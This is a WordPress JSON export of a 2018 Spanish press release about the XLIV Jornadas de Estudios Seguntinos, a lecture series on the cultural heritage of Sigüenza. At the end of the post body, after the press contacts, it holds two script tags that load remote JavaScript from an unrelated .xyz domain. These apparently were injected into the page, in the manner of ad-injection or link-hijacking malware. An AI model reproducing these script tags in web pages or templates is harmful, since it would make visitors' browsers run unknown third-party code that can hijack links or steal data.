{"id":229,"date":"2018-07-26T11:11:00","date_gmt":"2018-07-26T11:11:00","guid":{"rendered":"http:\/\/www.bandopress.com\/notas-de-prensa\/?p=229"},"modified":"2018-07-26T11:11:00","modified_gmt":"2018-07-26T11:11:00","slug":"las-xliv-jornadas-de-estudios-seguntinos-estaran-dedicadas-al-patrimonio-cultural-de-la-ciudad-del-doncel","status":"publish","type":"post","link":"http:\/\/www.bandopress.com\/notas-de-prensa\/2018\/07\/26\/las-xliv-jornadas-de-estudios-seguntinos-estaran-dedicadas-al-patrimonio-cultural-de-la-ciudad-del-doncel\/","title":{"rendered":"Las XLIV Jornadas de Estudios seguntinos estar\u00e1n dedicadas al Patrimonio Cultural de la Ciudad del Doncel"},"content":{"rendered":"<p><strong>Todas las conferencias se impartir\u00e1n en el Teatro Auditorio de El P\u00f3sito de 19.30 a 20.30 horas. Est\u00e1n organizadas por la Asociaci\u00f3n Cultural &#8216;El Doncel&#8217; de Amigos de Sig\u00fcenza y el Centro de Estudios Seguntinos, con el patrocinio del Ayuntamiento de Sig\u00fcenza y de la Fundaci\u00f3n Mart\u00ednez G\u00f3mez Gordo<\/strong><\/p>\n<p>En el A\u00f1o Europeo del Patrimonio Cultural, las XLIV Jornadas de Estudios Seguntinos se van a dedicar a poner en valor el rico patrimonio cultural de la ciudad de Sig\u00fcenza. Por esta raz\u00f3n, han obtenido el sello oficial de este A\u00f1o Europeo que se concede a todas las actividades que en el 2018 se ocupen de temas patrimoniales.<br \/>\nConviene destacar que el Patrimonio Cultural es el conjunto de bienes muebles, inmuebles e inmateriales heredados del pasado y que se decide proteger como parte de las se\u00f1as de identidad, sociales e hist\u00f3ricas, de una comunidad o pa\u00eds. Dentro del Patrimonio Cultural est\u00e1n incluidos no solo el patrimonio art\u00edstico, arquitect\u00f3nico, urban\u00edstico o arqueol\u00f3gico, sino tambi\u00e9n el etnol\u00f3gico, documental, bibliogr\u00e1fico e inmaterial.<\/p>\n<p>De todos estos tipos de patrimonio se tratar\u00e1 en las Jornadas. La conferencia inaugural, que estar\u00e1 dedicada a &#8216;Los tapices flamencos de la catedral de Sig\u00fcenza&#8217;, la impartir\u00e1 Margarita Garc\u00eda Calvo, que fue la primera investigadora que los analiz\u00f3 en su conjunto. La doctora ya explic\u00f3 con detalle en las Jornadas del 2014 los ocho tapices de la serie dedicada a &#8216;Las Alegor\u00edas de Palas Atenea&#8217;, que aquel a\u00f1o se restauraron y se mostraron al p\u00fablico en el marco de la exposici\u00f3n dedicada al A\u00f1o Greco. En esta ocasi\u00f3n hablar\u00e1 sobre las \u00faltimas investigaciones acerca de esta serie, y tambi\u00e9n sobre la que acaba de exponerse en la reci\u00e9n inaugurada Sala de la Fragua del claustro catedralicio, serie dedicada a la &#8216;Historia de R\u00f3mulo y Remo&#8217;.<\/p>\n<p>La inauguraci\u00f3n de la Sala de la Fragua y de los ocho tapices que recrean la fundaci\u00f3n de Roma forma parte de los actos culturales vinculados al A\u00f1o Jubilar concedido a la catedral de Sig\u00fcenza para conmemorar el 850 aniversario de su Consagraci\u00f3n. El jubileo se logra tras recorrer en el templo catedralicio el \u0093Iter Iubilaris\u0094, el \u0093Itinerario Jubilar\u0094, que tiene como uno de sus hitos el Altar de Santa Librada donde se guardan las reliquias de esta Virgen y M\u00e1rtir francesa, que trajo a la ciudad el obispo Bernardo de Ag\u00e9n.<\/p>\n<p>La historia de la Santa se narra con detalle en el retablo de Santa Librada, inserto en el citado altar, al que estar\u00e1 dedicada la segunda conferencia de estas Jornadas. La impartir\u00e1 Francisco Javier Ramos G\u00f3mez, y tendr\u00e1 como t\u00edtulo &#8216;El altar de Santa Librada, joya del patrimonio art\u00edstico de la catedral de Sig\u00fcenza, obra clave del pintor Juan Soreda&#8217;.<br \/>\nEl doctor es uno de los principales especialistas de la pintura renacentista en la provincia de Guadalajara y especialmente de la pintura seguntina de este periodo. En 2004 se public\u00f3 su libro &#8216;Juan Soreda y la pintura del Renacimiento en Sig\u00fcenza&#8217; que hab\u00eda ganado el a\u00f1o el anterior el Premio de investigaci\u00f3n hist\u00f3rica &#8216;Layna Serrano&#8217; convocado por la Diputaci\u00f3n de Guadalajara.<\/p>\n<p>\u0093Dedicar una conferencia al Altar de Santa Librada en estas Jornadas pocos meses despu\u00e9s de la conclusi\u00f3n su magn\u00edfica restauraci\u00f3n era obligado, ya que en el A\u00f1o Europeo del Patrimonio Cultural se valora sobremanera todos los esfuerzos que se llevan a cabo para restaurar y conservar los bienes heredados del pasado para que puedan disfrutarse en el futuro. No en vano el lema del A\u00f1o es: Nuestro patrimonio: el futuro en el pasado\u0094, valora Pilar Mart\u00ednez Taboada, cronista oficial de la ciudad y organizadora del ciclo.<\/p>\n<p>La tercera conferencia, dedicada a la &#8216;Fortis Seguntina. La catedral rom\u00e1nica y el C\u00edster&#8217;, la impartir\u00e1 el director del Museo Diocesano de Arte Antiguo de Sig\u00fcenza, Miguel \u00c1ngel Ortega Canales, can\u00f3nigo catedralicio y delegado diocesano de Patrimonio Cultural, quien analizar\u00e1 con todo lujo de detalles la exposici\u00f3n que con el mismo nombre se ha inaugurado recientemente en el museo para celebrar el 50 aniversario de su apertura.<\/p>\n<p>Esta exposici\u00f3n es a su vez un complemento indispensable del A\u00f1o Jubilar, pues con ella se pretende ayudar a entender y visualizar la catedral que se consagr\u00f3 en 1169. Objetivo que se logra a trav\u00e9s de una gran maqueta en la que se representa c\u00f3mo podr\u00eda ser la f\u00e1brica catedralicia en esa \u00e9poca; de unas replicas a tama\u00f1o natural de sus principales motivos decorativos, y de una cuidada selecci\u00f3n de documentos coet\u00e1neos conservados en el Archivo catedralicio.<\/p>\n<p>Como colof\u00f3n de las XLIV Jornadas de Estudios Seguntinos, en la \u00faltima de las conferencias, titulada &#8216;Las claves del Patrimonio Cultural de Sig\u00fcenza. Homenaje a su primer Cronista Oficial en el XL aniversario de la publicaci\u00f3n de su libro: Sig\u00fcenza. Historia. Arte. Folklore&#8217;, Pilar Mart\u00ednez Taboada se ocupar\u00e1 de analizar en conjunto el rico patrimonio seguntino en todas sus facetas, teniendo como hilo conductor los cap\u00edtulos del libro de Juan Antonio Mart\u00ednez G\u00f3mez Gordo, quien fuera Secretario perpetuo de la Asociaci\u00f3n Cultural &#8216;el Doncel&#8217; de Amigos de Sig\u00fcenza y editor de su revista de estudios &#8216;Anales Seguntinos&#8217;.<\/p>\n<p>\u0093Espero que estas XLIV Jornadas de Estudios Seguntinos, que se celebrar\u00e1n del 30 de julio al 2 de agosto, sirvan para conocer m\u00e1s a fondo el Patrimonio Cultural de nuestra ciudad y para que todos nos comprometamos a conservarlo y a trasmitirlo en perfectas condiciones a las generaciones futuras\u0094, valora Mart\u00ednez Taboada.<\/p>\n<p>Todas las conferencias se impartir\u00e1n en el Teatro Auditorio de El P\u00f3sito de 19.30 a 20.30 horas. Est\u00e1n organizadas por la Asociaci\u00f3n Cultural &#8216;El Doncel&#8217; de Amigos de Sig\u00fcenza y el Centro de Estudios Seguntinos, con el patrocinio del Ayuntamiento de Sig\u00fcenza y de la Fundaci\u00f3n Mart\u00ednez G\u00f3mez Gordo.<\/p>\n<p>M\u00e1s informaci\u00f3n:<br \/>\nAyuntamiento de Sig\u00fcenza. Prensa. 949 390 850<br \/>\nGabinete de Prensa. Javier Bravo. 606 411 053<\/p>\n<p><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr5.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr30_nt.min.js\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<div class=\"mh-excerpt\"><p>Todas las conferencias se impartir\u00e1n en el Teatro Auditorio de El P\u00f3sito de 19.30 a 20.30 horas. Est\u00e1n organizadas por la Asociaci\u00f3n Cultural &#8216;El Doncel&#8217; <a class=\"mh-excerpt-more\" href=\"http:\/\/www.bandopress.com\/notas-de-prensa\/2018\/07\/26\/las-xliv-jornadas-de-estudios-seguntinos-estaran-dedicadas-al-patrimonio-cultural-de-la-ciudad-del-doncel\/\" title=\"Las XLIV Jornadas de Estudios seguntinos estar\u00e1n dedicadas al Patrimonio Cultural de la Ciudad del Doncel\">[&#8230;]<\/a><\/p>\n<\/div>","protected":false},"author":1,"featured_media":230,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[12],"tags":[],"class_list":["post-229","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-castilla-la-mancha"],"_links":{"self":[{"href":"http:\/\/www.bandopress.com\/notas-de-prensa\/wp-json\/wp\/v2\/posts\/229","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.bandopress.com\/notas-de-prensa\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.bandopress.com\/notas-de-prensa\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.bandopress.com\/notas-de-prensa\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.bandopress.com\/notas-de-prensa\/wp-json\/wp\/v2\/comments?post=229"}],"version-history":[{"count":1,"href":"http:\/\/www.bandopress.com\/notas-de-prensa\/wp-json\/wp\/v2\/posts\/229\/revisions"}],"predecessor-version":[{"id":231,"href":"http:\/\/www.bandopress.com\/notas-de-prensa\/wp-json\/wp\/v2\/posts\/229\/revisions\/231"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/www.bandopress.com\/notas-de-prensa\/wp-json\/wp\/v2\/media\/230"}],"wp:attachment":[{"href":"http:\/\/www.bandopress.com\/notas-de-prensa\/wp-json\/wp\/v2\/media?parent=229"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.bandopress.com\/notas-de-prensa\/wp-json\/wp\/v2\/categories?post=229"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.bandopress.com\/notas-de-prensa\/wp-json\/wp\/v2\/tags?post=229"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}